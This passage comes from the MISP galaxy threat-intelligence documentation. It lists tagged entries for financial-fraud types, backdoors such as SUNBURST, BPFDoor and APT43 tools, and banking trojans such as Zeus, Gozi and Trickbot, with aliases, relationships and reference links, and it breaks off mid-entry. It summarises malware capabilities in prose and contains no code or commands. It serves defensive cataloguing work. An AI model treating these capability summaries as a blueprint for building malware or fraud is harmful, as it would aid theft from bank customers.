An illegal process of concealing the origins of money obtained illegally by passing it through a complex sequence of banking transfers or commercial transactions. The overall scheme of this process returns the money to the launderer in an obscure and indirect way.

The tag is: misp-galaxy:financial-fraud="Money laundering"

Table 590. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

BIN Attack

Credit cards are produced in BIN ranges. Where an issuer does not use random generation of the card number, it is possible for an attacker to obtain one good card number and generate further valid card numbers from it.

The tag is: misp-galaxy:financial-fraud="BIN Attack"

Table 591. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

DoS - Denial of Service Attack

In computing, a denial-of-service attack is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.

The tag is: misp-galaxy:financial-fraud="DoS - Denial of Service Attack"

Table 592. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

MITM - Man-in-the-Middle Attack

In cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other.

The tag is: misp-galaxy:financial-fraud="MITM - Man-in-the-Middle Attack"

Table 593. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Transaction Reversal Fraud

Unauthorized physical manipulation of an ATM cash withdrawal, made to appear as though cash has not been dispensed so that a reversal message is generated – SEE FULL TERMINAL FRAUD DEFINITION

The tag is: misp-galaxy:financial-fraud="Transaction Reversal Fraud"

Table 594. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Transaction Message Adulteration

The data contained in an authorisation message is manipulated to try to fool the payment processor.

The tag is: misp-galaxy:financial-fraud="Transaction Message Adulteration"

Table 595. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

First Party (Friendly) Fraud

Fraud committed against a financial institution by one of its own customers.

The tag is: misp-galaxy:financial-fraud="First Party (Friendly) Fraud"

Table 596. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Identity Spoofing (or entity hacking)

Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principal or use stolen / spoofed authentication credentials. Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity.

The tag is: misp-galaxy:financial-fraud="Identity Spoofing (or entity hacking)"

Table 597. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Authorised Push Payment Fraud

A form of fraud in which victims are manipulated into making real-time payments to fraudsters, typically by social engineering attacks involving impersonation.

The tag is: misp-galaxy:financial-fraud="Authorised Push Payment Fraud"

Table 598. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Direct Debit Fraud

Direct debit fraud can take place in several ways. It is often associated with identity theft, where the scammer gains access to the bank account information by posing as the victim. They can pay for services and products via a direct debit option and use this account until its owner notices.

The tag is: misp-galaxy:financial-fraud="Direct Debit Fraud"

Table 599. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Extortion

Obtaining benefit through coercion.

The tag is: misp-galaxy:financial-fraud="Extortion"

Table 600. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Smishing

Smishing, also known as "SMS Phishing", is a form of criminal activity using social engineering techniques. SMS phishing uses cell phone text messages to deliver information and/or requests to induce people to divulge information or to take action that will compromise their personal or confidential information.

The tag is: misp-galaxy:financial-fraud="Smishing"

Table 601. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Shoulder Surfing

Technique used to obtain information such as personal identification numbers (PINs), passwords and other confidential data by looking over the victim’s shoulder.

The tag is: misp-galaxy:financial-fraud="Shoulder Surfing"

Table 602. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Distraction

The process of diverting the attention of an individual or group from a desired area of focus and thereby blocking or diminishing the reception of desired information.

The tag is: misp-galaxy:financial-fraud="Distraction"

Table 603. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Push Payments

Authorised push payment fraud happens when fraudsters deceive consumers or individuals at a business to send them a payment under false pretences to a bank account controlled by the fraudster. As payments made using real-time payment schemes are irrevocable, the victims cannot reverse a payment once they realise they have been conned.

The tag is: misp-galaxy:financial-fraud="Push Payments"

Table 604. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

ATM Malware

Unauthorised software, or authorised software run in an unauthorised manner, on the ATM PC - SEE FULL TERMINAL FRAUD DEFINITION

The tag is: misp-galaxy:financial-fraud="ATM Malware"

Table 605. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Data Breach

A data breach is a security incident in which sensitive, protected or confidential data is copied, transmitted, viewed, stolen or used from a PC or Computer Network by an entity unauthorised to do so.

The tag is: misp-galaxy:financial-fraud="Data Breach"

Table 606. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Ransomware

A type of malicious software designed to block access to a computer system until a sum of money is paid.

The tag is: misp-galaxy:financial-fraud="Ransomware"

Table 607. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Fake Website

A website that is not a legitimate venue; the site is designed to entice the visitor into revealing sensitive information, to download some form of malware or to purchase products that never arrive.

The tag is: misp-galaxy:financial-fraud="Fake Website"

Table 608. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Fake App

Apps in mobile devices that trick users into downloading them. They may also pose as quirky and attractive apps, providing interesting services. Once installed on a mobile device, fake apps can perform a variety of malicious routines.

The tag is: misp-galaxy:financial-fraud="Fake App"

Table 609. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

e-Skimming

Cyber criminals introduce skimming code on e-commerce payment card processing web pages to capture credit card and personally identifiable information and send the stolen data to a domain under their control.

The tag is: misp-galaxy:financial-fraud="e-Skimming"

Table 610. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Skimming - CPP UPT

CPP analysis identifies payment terminal locations (parking, transport, fuel, etc.) from where card numbers were stolen so that banks can mitigate fraud on other compromised cards.

The tag is: misp-galaxy:financial-fraud="Skimming - CPP UPT"

Table 611. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Skimming - CPP Virtual Terminal

Same as e-Skimming.

The tag is: misp-galaxy:financial-fraud="Skimming - CPP Virtual Terminal"

Table 612. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Card Trapping

Unauthorized physical ATM manipulation, preventing the card from being returned to the customer - SEE FULL TERMINAL FRAUD DEFINITION

The tag is: misp-galaxy:financial-fraud="Card Trapping"

Table 613. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Lack of Patching / Security

Patch management is the best practice of upgrading existing software applications to remove any security weaknesses that could be exploited by attackers. Lack of proper patching allows cyber criminals to exploit systems and networks.

The tag is: misp-galaxy:financial-fraud="Lack of Patching / Security"

Table 614. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Bad implementation

Process where an information system is deployed into a production environment with faults, errors or vulnerabilities.

The tag is: misp-galaxy:financial-fraud="Bad implementation"

Table 615. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Deployment Error

Implementation of a system, solution or service not according to defined and tested best practices.

The tag is: misp-galaxy:financial-fraud="Deployment Error"

Table 616. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Merchant Negligence

Merchants not following best practice procedures to avoid criminal or fraudulent activity.

The tag is: misp-galaxy:financial-fraud="Merchant Negligence"

Table 617. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Implementation not according to Standards

Implementation of a system, solution or service not according to defined and tested standards.

The tag is: misp-galaxy:financial-fraud="Implementation not according to Standards"

Table 618. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Backdoor

A list of backdoor malware.

Backdoor is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

raw-data

WellMess

Cross-platform malware written in Golang, compatible with Linux and Windows. Although there are some minor differences, both variants have the same functionality. The malware communicates with a CnC server using HTTP requests and performs functions based on the received commands. Results of command execution are sent in HTTP POST requests data (RSA-encrypted). Main functionalities are: (1) Execute arbitrary shell commands, (2) Upload/Download files. The PE variant of the infection, in addition, executes PowerShell scripts. A .Net version was also observed in the wild.

The tag is: misp-galaxy:backdoor="WellMess"

WellMess has relationships with:

  • similar: misp-galaxy:malpedia="WellMess" with estimative-language:likelihood-probability="likely"

Table 619. Table References

Links

https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html

Rosenbridge

The rosenbridge backdoor is a small, non-x86 core embedded alongside the main x86 core in the CPU. It is enabled by a model-specific-register control bit, and then toggled with a launch-instruction. The embedded core is then fed commands, wrapped in a specially formatted x86 instruction. The core executes these commands (which we call the 'deeply embedded instruction set'), bypassing all memory protections and privilege checks.

While the backdoor should require kernel level access to activate, it has been observed to be enabled by default on some systems, allowing any unprivileged code to modify the kernel.

The rosenbridge backdoor is entirely distinct from other publicly known coprocessors on x86 CPUs, such as the Management Engine or Platform Security Processor; it is more deeply embedded than any known coprocessor, having access to not only all of the CPU’s memory, but its register file and execution pipeline as well.

The tag is: misp-galaxy:backdoor="Rosenbridge"

Table 620. Table References

Links

https://www.bleepingcomputer.com/news/security/backdoor-mechanism-discovered-in-via-c3-x86-processors/

https://github.com/xoreaxeaxeax/rosenbridge

https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Christopher%20Domas/DEFCON-26-Christopher-Domas-GOD-MODE-%20UNLOCKED-hardware-backdoors-in-x86-CPUs.pdf

ServHelper

The purpose of the macro was to download and execute a variant of ServHelper that set up reverse SSH tunnels that enabled access to the infected host through the Remote Desktop Protocol (RDP) port 3389.

"Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to “hijack” legitimate user accounts or their web browser profiles and use them as they see fit," researchers from Proofpoint explain in an analysis released today.

The other ServHelper variant does not include the tunneling and hijacking capabilities and functions only as a downloader for the FlawedGrace RAT.

The tag is: misp-galaxy:backdoor="ServHelper"

Table 621. Table References

Links

https://www.bleepingcomputer.com/news/security/new-servhelper-backdoor-and-flawedgrace-rat-pushed-by-necurs-botnet/

Rising Sun

The Rising Sun backdoor uses the RC4 cipher to encrypt its configuration data and communications. As with most backdoors, on initial infection, Rising Sun will send data regarding the infected system to a command and control (C2) site. That information captures computer and user name, IP address, operating system version and network adapter information. Rising Sun contains 14 functions including executing commands, obtaining information on disk drives and running processes, terminating processes, obtaining file creation and last access times, reading and writing files, deleting files, altering file attributes, clearing the memory of processes and connecting to a specified IP address.

The tag is: misp-galaxy:backdoor="Rising Sun"

Table 622. Table References

Links

https://www.bluvector.io/threat-report-rising-sun-operation-sharpshooter/

SLUB

A new backdoor was observed using the Github Gist service and the Slack messaging system as communication channels with its masters, as well as targeting a very specific type of victim using a watering hole attack. The backdoor, dubbed SLUB by the Trend Micro Cyber Safety Solutions Team who detected it in the wild, is part of a multi-stage infection process designed by capable threat actors who programmed it in C++. SLUB uses statically-linked curl, boost, and JsonCpp libraries for performing HTTP requests, "extracting commands from gist snippets," and "parsing Slack channel communication." The campaign recently observed by the Trend Micro security researchers abusing Github and Slack uses a multi-stage infection process.

The tag is: misp-galaxy:backdoor="SLUB"

SLUB has relationships with:

  • similar: misp-galaxy:tool="SLUB Backdoor" with estimative-language:likelihood-probability="likely"

Table 623. Table References

Links

https://www.bleepingcomputer.com/news/security/new-slub-backdoor-uses-slack-github-as-communication-channels/

Asruex

Since it first emerged in 2015, Asruex has been known for its backdoor capabilities and connection to the spyware DarkHotel. However, when we encountered Asruex in a PDF file, we found that a variant of the malware can also act as an infector particularly through the use of old vulnerabilities CVE-2012-0158 and CVE-2010-2883, which inject code in Word and PDF files respectively.

The tag is: misp-galaxy:backdoor="Asruex"

Table 624. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/

FlowerPippi

The tag is: misp-galaxy:backdoor="FlowerPippi"

Table 625. Table References

Links

https://securityintelligence.com/news/ta505-delivers-new-gelup-malware-tool-flowerpippi-backdoor-via-spam-campaign/

Speculoos

A FreeBSD-based payload, Speculoos was delivered by exploiting CVE-2019-19781, a vulnerability affecting the Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliances that allowed an adversary to remotely execute arbitrary commands. This vulnerability was first disclosed on December 17, 2019 via security bulletin CTX267679, which contained several mitigation recommendations. By January 24, 2020, permanent patches for the affected appliances were issued. Based on the spread of industries and regions, in addition to the timing of the vulnerability disclosure, we believe this campaign may have been more opportunistic in nature compared to the highly targeted attack campaigns that are often associated with these types of adversaries. However, the exploitation of the vulnerability in conjunction with delivery of a backdoor specifically designed to execute on the associated FreeBSD operating system indicates that the adversary was absolutely targeting the affected devices.

The tag is: misp-galaxy:backdoor="Speculoos"

Speculoos has relationships with:

  • used-by: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="very-likely"

Table 626. Table References

Links

https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/

Mori Backdoor

Mori Backdoor has been used by Seedworm.

The tag is: misp-galaxy:backdoor="Mori Backdoor"

Table 627. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east

BazarBackdoor

Something that made the brute-force attacks on RDP connections easier was a new module of the notorious Trojan, TrickBot. It now seems that the TrickBot developers have a new tactic. Cybersecurity researchers have discovered a new phishing campaign that delivers a stealthy backdoor called BazarBackdoor, which can be used to compromise and gain full access to corporate networks. As is the case with 91% of cyberattacks, this one starts with a phishing email. A range of subjects are used to personalize the emails: customer complaints, coronavirus-themed payroll reports, or employee termination lists. All these emails contain links to documents hosted on Google Docs. To send the malicious emails, the cybercriminals use the marketing platform Sendgrid. This campaign uses spear phishing, which means that the perpetrators have made an effort to ensure that the websites sent in the emails seem legitimate and correspond to the email subjects.

The tag is: misp-galaxy:backdoor="BazarBackdoor"

BazarBackdoor is also known as:

  • BEERBOT

  • KEGTAP

  • Team9Backdoor

  • bazaloader

  • bazarloader

  • bazaarloader

Table 628. Table References

Links

https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike

https://www.pandasecurity.com/en/mediacenter/business/bazarbackdoor-trickbot-backdoor/

SUNBURST

Backdoor.Sunburst is Malwarebytes’ detection name for a trojanized update to SolarWinds’ Orion IT monitoring and management software.

The tag is: misp-galaxy:backdoor="SUNBURST"

SUNBURST is also known as:

  • Solarigate

SUNBURST has relationships with:

  • dropped-by: misp-galaxy:tool="SUNSPOT" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

Table 629. Table References

Links

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://www.varonis.com/blog/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/

https://blog.malwarebytes.com/detections/backdoor-sunburst/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

BPFDoor

BPFDoor is a passive backdoor used by a China-based threat actor. This backdoor supports multiple protocols for communicating with a C2, including TCP, UDP, and ICMP, allowing the threat actor a variety of mechanisms to interact with the implant.

The tag is: misp-galaxy:backdoor="BPFDoor"

Table 630. Table References

Links

https://troopers.de/troopers22/talks/7cv8pz/

https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896?gi=1effe9eb6507

https://twitter.com/cyb3rops/status/1523227511551033349

https://twitter.com/CraigHRowland/status/1523266585133457408

BOLDMOVE

According to Mandiant, this malware family is attributed to an actor with a potential Chinese background, and its Linux variant is related to exploitation of Fortinet’s SSL-VPN (CVE-2022-42475).

The tag is: misp-galaxy:backdoor="BOLDMOVE"

Table 631. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove

https://malpedia.caad.fkie.fraunhofer.de/details/elf.boldmove

https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw

PowerMagic

The tag is: misp-galaxy:backdoor="PowerMagic"

Table 632. Table References

Links

https://securelist.com/bad-magic-apt/109087/

VEILEDSIGNAL

VEILEDSIGNAL is a backdoor written in C that is able to execute shellcode and terminate itself. Additionally, VEILEDSIGNAL relies on additional modules that connect via Windows named pipes to interact with the Command and Control (C2) infrastructure.

The tag is: misp-galaxy:backdoor="VEILEDSIGNAL"

Table 633. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

POOLRAT

POOLRAT is a C/C++ macOS backdoor capable of collecting basic system information and executing commands. The commands performed include running arbitrary commands, securely deleting files, reading and writing files, and updating the configuration.

The tag is: misp-galaxy:backdoor="POOLRAT"

Table 634. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

BIGRAISIN

BIGRAISIN is a C/C++ Windows based backdoor. It is capable of executing downloaded commands, executing downloaded files, and deleting files. Availability: Non-public

The tag is: misp-galaxy:backdoor="BIGRAISIN"

BIGRAISIN has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 635. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

FASTFIRE

FASTFIRE is a malicious APK that connects to a server and sends details of the compromised device back to command and control (C2). Availability: Non-public

The tag is: misp-galaxy:backdoor="FASTFIRE"

FASTFIRE has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 636. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

GRAYZONE

GRAYZONE is a C/C++ Windows backdoor capable of collecting system information, logging keystrokes, and downloading additional stages from the C2 server. Availability: Non-public

The tag is: misp-galaxy:backdoor="GRAYZONE"

GRAYZONE has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 637. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

HANGMAN.V2

HANGMAN.V2 is a variant of the backdoor HANGMAN. HANGMAN.V2 is very similar to HANGMAN, but uses HTTP for the network communications and formats data passed to the C2 server differently. Availability: Non-public

The tag is: misp-galaxy:backdoor="HANGMAN.V2"

HANGMAN.V2 has relationships with:

  • variant-of: misp-galaxy:malpedia="HOPLIGHT" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 638. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

LOGCABIN

LOGCABIN is a file-less and modular backdoor with multiple stages. The stages consist of several VisualBasic and PowerShell scripts that are downloaded and executed. LOGCABIN collects detailed system information and sends it to the C2 before performing additional commands. Availability: Non-public

The tag is: misp-galaxy:backdoor="LOGCABIN"

LOGCABIN has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 639. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

SOURDOUGH

SOURDOUGH is a backdoor written in C that communicates via HTTP. Its capabilities include keylogging, screenshot capture, file transfer, file execution, and directory enumeration. Availability: Non-public

The tag is: misp-galaxy:backdoor="SOURDOUGH"

SOURDOUGH has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 640. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

TROIBOMB

TROIBOMB is a C/C++ Windows backdoor that is capable of collecting system information and performing commands from the C2 server. Availability: Non-public

The tag is: misp-galaxy:backdoor="TROIBOMB"

TROIBOMB has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 641. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

ZIPLINE

ZIPLINE makes use of extensive functionality to ensure the authentication of its custom protocol used to establish command and control (C2).

The tag is: misp-galaxy:backdoor="ZIPLINE"

Table 642. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

Banker

A list of banker malware.

Banker is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Unknown - raw-data

Zeus

Zeus is a trojan horse that is primarily delivered via drive-by-downloads, malvertising, exploit kits and malspam campaigns. It uses man-in-the-browser keystroke logging and form grabbing to steal information from victims. Source was leaked in 2011.

The tag is: misp-galaxy:banker="Zeus"

Zeus is also known as:

  • Zbot

Zeus has relationships with:

  • similar: misp-galaxy:tool="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:botnet="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Zeus" with estimative-language:likelihood-probability="likely"

Table 643. Table References

Links

https://usa.kaspersky.com/resource-center/threats/zeus-virus

Vawtrak

Delivered primarily by exploit kits as well as malspam campaigns utilizing macro based Microsoft Office documents as attachments. Vawtrak/Neverquest is a modularized banking trojan designed to steal credentials through harvesting, keylogging, Man-In-The-Browser, etc.

The tag is: misp-galaxy:banker="Vawtrak"

Vawtrak is also known as:

  • Neverquest

Vawtrak has relationships with:

  • similar: misp-galaxy:tool="Vawtrak" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Vawtrak" with estimative-language:likelihood-probability="likely"

Table 644. Table References

Links

https://www.kaspersky.com/blog/neverquest-trojan-built-to-steal-from-hundreds-of-banks/3247/

https://www.fidelissecurity.com/threatgeek/2016/05/vawtrak-trojan-bank-it-evolving

https://www.proofpoint.com/us/threat-insight/post/In-The-Shadows

https://www.botconf.eu/wp-content/uploads/2016/11/2016-Vawtrak-technical-report.pdf

Dridex

Dridex leverages redirection attacks designed to send victims to malicious replicas of the banking sites they think they're visiting.

The tag is: misp-galaxy:banker="Dridex"

Dridex is also known as:

  • Feodo Version D

  • Cridex

Dridex has relationships with:

  • similar: misp-galaxy:tool="Dridex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dridex" with estimative-language:likelihood-probability="likely"

Table 645. Table References

Links

https://blog.malwarebytes.com/detections/trojan-dridex/

https://feodotracker.abuse.ch/

Gozi

Banking trojan delivered primarily via email (typically malspam) and exploit kits. Gozi 1.0 source leaked in 2010.

The tag is: misp-galaxy:banker="Gozi"

Gozi is also known as:

  • Ursnif

  • CRM

  • Snifula

  • Papras

Gozi has relationships with:

  • similar: misp-galaxy:tool="Snifula" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Gozi" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Snifula" with estimative-language:likelihood-probability="likely"

Table 646. Table References

Links

https://www.secureworks.com/research/gozi

https://www.gdatasoftware.com/blog/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007

https://lokalhost.pl/gozi_tree.txt

Goziv2

Banking trojan attributed to Project Blitzkrieg targeting U.S. Financial institutions.

The tag is: misp-galaxy:banker="Goziv2"

Goziv2 is also known as:

  • Prinimalka

Table 647. Table References

Links

https://krebsonsecurity.com/tag/gozi-prinimalka/

https://securityintelligence.com/project-blitzkrieg-how-to-block-the-planned-prinimalka-gozi-trojan-attack/

https://lokalhost.pl/gozi_tree.txt

Gozi ISFB

Banking trojan based on Gozi source. Features include web injects for the victims’ browsers, screenshotting, video recording, transparent redirections, etc. Source leaked ~ end of 2015.

The tag is: misp-galaxy:banker="Gozi ISFB"

Gozi ISFB has relationships with:

  • similar: misp-galaxy:malpedia="ISFB" with estimative-language:likelihood-probability="likely"

Table 648. Table References

Links

https://www.govcert.admin.ch/blog/18/gozi-isfb-when-a-bug-really-is-a-feature

https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/

https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak

https://lokalhost.pl/gozi_tree.txt

Dreambot

Dreambot is a variant of Gozi ISFB that is spread via numerous exploit kits as well as through malspam email attachments and links.

The tag is: misp-galaxy:banker="Dreambot"

Table 649. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/

https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality

https://lokalhost.pl/gozi_tree.txt

IAP

Gozi ISFB variant.

The tag is: misp-galaxy:banker="IAP"

IAP has relationships with:

  • similar: misp-galaxy:malpedia="ISFB" with estimative-language:likelihood-probability="likely"

Table 650. Table References

Links

https://lokalhost.pl/gozi_tree.txt

http://archive.is/I7hi8#selection-217.0-217.6

GozNym

The GozNym hybrid takes the best of both Nymaim and Gozi ISFB. From the Nymaim malware, it leverages the dropper’s stealth and persistence; the Gozi ISFB parts add the banking Trojan’s capabilities to facilitate fraud via infected Internet browsers.

The tag is: misp-galaxy:banker="GozNym"

Table 651. Table References

Links

https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/

https://lokalhost.pl/gozi_tree.txt

Zloader Zeus

Zloader is a loader that loads different payloads, one of which is a Zeus module. Delivered via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="Zloader Zeus"

Zloader Zeus is also known as:

  • Zeus Terdot

Zloader Zeus has relationships with:

  • similar: misp-galaxy:malpedia="Zloader" with estimative-language:likelihood-probability="likely"

Table 652. Table References

Links

https://blog.threatstop.com/zloader/terdot-that-man-in-the-middle

https://www.scmagazine.com/terdot-zloaderzbot-combo-abuses-certificate-app-to-pull-off-mitm-browser-attacks/article/634443/

Zeus VM

Zeus variant that utilizes steganography in image files to retrieve its configuration file.

The tag is: misp-galaxy:banker="Zeus VM"

Zeus VM is also known as:

  • VM Zeus

Zeus VM has relationships with:

  • similar: misp-galaxy:malpedia="VM Zeus" with estimative-language:likelihood-probability="likely"

Table 653. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/

https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/

Zeus Sphinx

Sphinx is a modular banking trojan that is a commercial offering sold to cybercriminals via underground fraudster boards.

The tag is: misp-galaxy:banker="Zeus Sphinx"

Zeus Sphinx has relationships with:

  • similar: misp-galaxy:malpedia="Zeus Sphinx" with estimative-language:likelihood-probability="likely"

Table 654. Table References

Links

https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/

Panda Banker

Zeus like banking trojan that is delivered primarily through malspam emails and exploit kits.

The tag is: misp-galaxy:banker="Panda Banker"

Panda Banker is also known as:

  • Zeus Panda

Table 655. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market

https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf

https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers

Zeus KINS

Zeus KINS is a modified version of ZeuS 2.0.8.9. It contains an encrypted version of its config in the registry.

The tag is: misp-galaxy:banker="Zeus KINS"

Zeus KINS is also known as:

  • Kasper Internet Non-Security

  • Maple

Zeus KINS has relationships with:

  • similar: misp-galaxy:malpedia="KINS" with estimative-language:likelihood-probability="likely"

Table 656. Table References

Links

https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/

https://github.com/nyx0/KINS

Chthonic

Chthonic according to Kaspersky is an evolution of Zeus VM. It uses the same encryptor as Andromeda bot, the same encryption scheme as Zeus AES and Zeus V2 Trojans, and a virtual machine similar to that used in ZeusVM and KINS malware.

The tag is: misp-galaxy:banker="Chthonic"

Chthonic is also known as:

  • Chtonic

Chthonic has relationships with:

  • similar: misp-galaxy:malpedia="Chthonic" with estimative-language:likelihood-probability="likely"

Table 657. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan

https://securelist.com/chthonic-a-new-modification-of-zeus/68176/

Trickbot

Trickbot is a bot that is delivered via exploit kits and malspam campaigns. The bot is capable of downloading modules, including a banker module. Trickbot also shares roots with the Dyre banking trojan.

The tag is: misp-galaxy:banker="Trickbot"

Trickbot is also known as:

  • Trickster

  • Trickloader

Trickbot has relationships with:

  • similar: misp-galaxy:tool="Trick Bot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TrickBot" with estimative-language:likelihood-probability="likely"

Table 658. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/

https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/

http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html

https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/

https://www.bleepingcomputer.com/news/security/trickbot-banking-trojan-starts-stealing-windows-problem-history/

Dyre

Dyre is a banking trojan distributed primarily via exploit kits and malspam emails. It has a modular architecture and utilizes man-in-the-browser functionality. It also leverages a backconnect server that allows threat actors to connect to a bank website through the victim’s computer.

The tag is: misp-galaxy:banker="Dyre"

Dyre is also known as:

  • Dyreza

Dyre has relationships with:

